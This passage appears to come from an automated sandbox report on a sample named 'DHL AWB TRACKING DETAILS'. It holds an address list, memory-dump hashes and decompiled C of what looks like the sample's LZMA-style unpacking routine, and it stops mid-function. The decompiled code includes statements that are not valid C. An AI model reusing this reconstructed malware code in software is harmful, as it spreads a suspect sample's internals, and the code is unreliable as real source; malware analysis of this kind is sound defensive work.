                    0x00000000
                    0x00406222
                    0x00406220
                    0x00406227
                    0x00406227
                    0x00406227
                    0x00406227
                    0x00000000
                    0x00000000
                    0x00406262
                    0x00406262
                    0x00406266
                    0x0040686e
                    0x00000000
                    0x0040686e
                    0x0040626c
                    0x0040626f
                    0x00406272
                    0x00406276
                    0x00406279
                    0x0040627f
                    0x00406281
                    0x00406281
                    0x00406281
                    0x00406284
                    0x00406287
                    0x00406287
                    0x0040628d
                    0x0040622b
                    0x0040622b
                    0x0040622e
                    0x00000000
                    0x0040622e
                    0x0040628f
                    0x0040628f
                    0x00406292
                    0x00406295
                    0x00406298
                    0x0040629b
                    0x0040629e
                    0x004062a1
                    0x004062a4
                    0x004062a7
                    0x004062aa
                    0x004062ad
                    0x004062c5
                    0x004062c8
                    0x004062cb
                    0x004062ce
                    0x004062ce
                    0x004062d1
                    0x004062d5
                    0x004062d7
                    0x004062af
                    0x004062af
                    0x004062b7
                    0x004062bc
                    0x004062be
                    0x004062c0
                    0x004062c0
                    0x004062da
                    0x004062e1
                    0x004062e4
                    0x00000000
                    0x004062e6
                    0x00000000
                    0x004062e6
                    0x00000000
                    0x00406573
                    0x00406573
                    0x00406577
                    0x0040689e
                    0x00000000
                    0x0040689e
                    0x0040657d
                    0x00406580
                    0x00406583
                    0x00406587
                    0x0040658a
                    0x00406590
                    0x00406592
                    0x00406592
                    0x00406592
                    0x00406595
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406682
                    0x00406686
                    0x004066a8
                    0x004066ab
                    0x004066b5
                    0x004066b8
                    0x004066b8
                    0x004066b8
                    0x00000000
                    0x004066b8
                    0x004066b8
                    0x00406688
                    0x0040668b
                    0x0040668f
                    0x00406692
                    0x00406692
                    0x00406695
                    0x00000000
                    0x00000000
                    0x0040673f
                    0x00406743
                    0x00406761
                    0x00406761
                    0x00406761
                    0x00406768
                    0x0040676f
                    0x00406776
                    0x00406776
                    0x00000000
                    0x00406776
                    0x00406745
                    0x00406748
                    0x0040674b
                    0x0040674e
                    0x00406755
                    0x00406699
                    0x00406699
                    0x0040669c
                    0x00000000
                    0x00000000
                    0x00406830
                    0x00406833
                    0x00406734
                    0x00000000
                    0x00000000
                    0x0040646a
                    0x0040646c
                    0x00406473
                    0x00406474
                    0x00406476
                    0x00406479
                    0x00000000
                    0x00000000
                    0x00406481
                    0x00406484
                    0x00406487
                    0x00406489
                    0x0040648b
                    0x0040648b
                    0x0040648c
                    0x0040648f
                    0x00406496
                    0x00406499
                    0x004064a7
                    0x00000000
                    0x00000000
                    0x0040677d
                    0x0040677d
                    0x00406780
                    0x00406787
                    0x00000000
                    0x00000000
                    0x0040678c
                    0x0040678c
                    0x00406790
                    0x004068c8
                    0x00000000
                    0x004068c8
                    0x00406796
                    0x00406799
                    0x0040679c
                    0x004067a0
                    0x004067a3
                    0x004067a9
                    0x004067ab
                    0x004067ab
                    0x004067ab
                    0x004067ae
                    0x004067b1
                    0x004067b1
                    0x004067b1
                    0x004067b1
                    0x004067b4
                    0x004067b4
                    0x004067b8
                    0x00406818
                    0x0040681b
                    0x00406820
                    0x00406821
                    0x00406823
                    0x00406825
                    0x00406828
                    0x00406734
                    0x00406734
                    0x00000000
                    0x0040673a
                    0x00406734
                    0x004067ba
                    0x004067c0
                    0x004067c3
                    0x004067c6
                    0x004067c9
                    0x004067cc
                    0x004067cf
                    0x004067d2
                    0x004067d5
                    0x004067d8
                    0x004067db
                    0x004067f4
                    0x004067f7
                    0x004067fa
                    0x004067fd
                    0x00406801
                    0x00406803
                    0x00406803
                    0x00406804
                    0x00406807
                    0x004067dd
                    0x004067dd
                    0x004067e5
                    0x004067ea
                    0x004067ec
                    0x004067ef
                    0x004067ef
                    0x0040680a
                    0x00406811
                    0x00000000
                    0x00406813
                    0x00000000
                    0x00406813
                    0x00000000
                    0x004064af
                    0x004064b2
                    0x004064e8
                    0x00406618
                    0x00406618
                    0x00406618
                    0x00406618
                    0x0040661b
                    0x0040661b
                    0x0040661e
                    0x00406620
                    0x004068aa
                    0x00000000
                    0x004068aa
                    0x00406626
                    0x00406629
                    0x00000000
                    0x00000000
                    0x0040662f
                    0x00406633
                    0x00406636
                    0x00406636
                    0x00406636
                    0x00000000
                    0x00406636
                    0x004064b4
                    0x004064b6
                    0x004064b8
                    0x004064ba
                    0x004064bd
                    0x004064be
                    0x004064c0
                    0x004064c2
                    0x004064c5
                    0x004064c8
                    0x004064de
                    0x004064e3
                    0x0040651b
                    0x0040651b
                    0x0040651f
                    0x0040654b
                    0x0040654d
                    0x00406554
                    0x00406557
                    0x0040655a
                    0x0040655a
                    0x0040655f
                    0x0040655f
                    0x00406561
                    0x00406564
                    0x0040656b
                    0x0040656e
                    0x0040659b
                    0x0040659b
                    0x0040659e
                    0x004065a1
                    0x00406615
                    0x00406615
                    0x00406615
                    0x00000000
                    0x00406615
                    0x004065a3
                    0x004065a9
                    0x004065ac
                    0x004065af
                    0x004065b2
                    0x004065b5
                    0x004065b8
                    0x004065bb
                    0x004065be
                    0x004065c1
                    0x004065c4
                    0x004065dd
                    0x004065df
                    0x004065e2
                    0x004065e3
                    0x004065e6
                    0x004065e8
                    0x004065eb
                    0x004065ed
                    0x004065ef
                    0x004065f2
                    0x004065f4
                    0x004065f7
                    0x004065fb
                    0x004065fd
                    0x004065fd
                    0x004065fe
                    0x00406601
                    0x00406604
                    0x004065c6
                    0x004065c6
                    0x004065ce
                    0x004065d3
                    0x004065d5
                    0x004065d8
                    0x004065d8
                    0x00406607
                    0x0040660e
                    0x00406598
                    0x00406598
                    0x00406598
                    0x00406598
                    0x00000000
                    0x00406610
                    0x00000000
                    0x00406610
                    0x0040660e
                    0x00406521
                    0x00406524
                    0x00406526
                    0x00406529
                    0x0040652c
                    0x0040652f
                    0x00406531
                    0x00406534
                    0x00406537
                    0x00406537
                    0x0040653a
                    0x0040653a
                    0x0040653d
                    0x00406544
                    0x00406518
                    0x00406518
                    0x00406518
                    0x00406518
                    0x00000000
                    0x00406546
                    0x00000000
                    0x00406546
                    0x00406544
                    0x004064ca
                    0x004064cd
                    0x004064cf
                    0x004064d2
                    0x00000000
                    0x00000000
                    0x00406231
                    0x00406231
                    0x00406235
                    0x0040687a
                    0x00000000
                    0x0040687a
                    0x0040623b
                    0x0040623e
                    0x00406241
                    0x00406244
                    0x00406247
                    0x0040624a
                    0x0040624d
                    0x0040624f
                    0x00406252
                    0x00406255
                    0x00406258
                    0x0040625a
                    0x0040625a
                    0x0040625a
                    0x00000000
                    0x00000000
                    0x004063bc
                    0x004063bc
                    0x004063c0
                    0x00406886
                    0x00000000
                    0x00406886
                    0x004063c6
                    0x004063c9
                    0x004063cc
                    0x004063cf
                    0x004063d1
                    0x004063d1
                    0x004063d1
                    0x004063d4
                    0x004063d7
                    0x004063da
                    0x004063dd
                    0x004063e0
                    0x004063e3
                    0x004063e4
                    0x004063e6
                    0x004063e6
                    0x004063e6
                    0x004063e9
                    0x004063ec
                    0x004063ef
                    0x004063f2
                    0x004063f2
                    0x004063f2
                    0x004063f5
                    0x004063f7
                    0x004063f7
                    0x00000000
                    0x00000000
                    0x00406639
                    0x00406639
                    0x00406639
                    0x0040663d
                    0x00000000
                    0x00000000
                    0x00406643
                    0x00406646
                    0x00406649
                    0x0040664c
                    0x0040664e
                    0x0040664e
                    0x0040664e
                    0x00406651
                    0x00406654
                    0x00406657
                    0x0040665a
                    0x0040665d
                    0x00406660
                    0x00406661
                    0x00406663
                    0x00406663
                    0x00406663
                    0x00406666
                    0x00406669
                    0x0040666c
                    0x0040666f
                    0x00406672
                    0x00406676
                    0x00406678
                    0x0040667b
                    0x00000000
                    0x0040667d
                    0x004063fa
                    0x004063fa
                    0x00000000
                    0x004063fa
                    0x0040667b
                    0x004068b0
                    0x00000000
                    0x00000000
                    0x00405edf
                    0x004068e7
                    0x004068e7
                    0x00000000
                    0x004068e7
                    0x00406734
                    0x004066bb
                    0x004066b8
                    0x00000000
                    0x0040640d

                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
                    • Instruction ID: b59dca7a73cfed8a049a6b6a8b4acb584d685fa01604791ee1d6e054a78b3619
                    • Opcode Fuzzy Hash: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
                    • Instruction Fuzzy Hash: 08714671D04229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7789996DF54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406355 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                    Download Yara Rule
                    C-Code - Quality: 98%
                    			E00406355() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
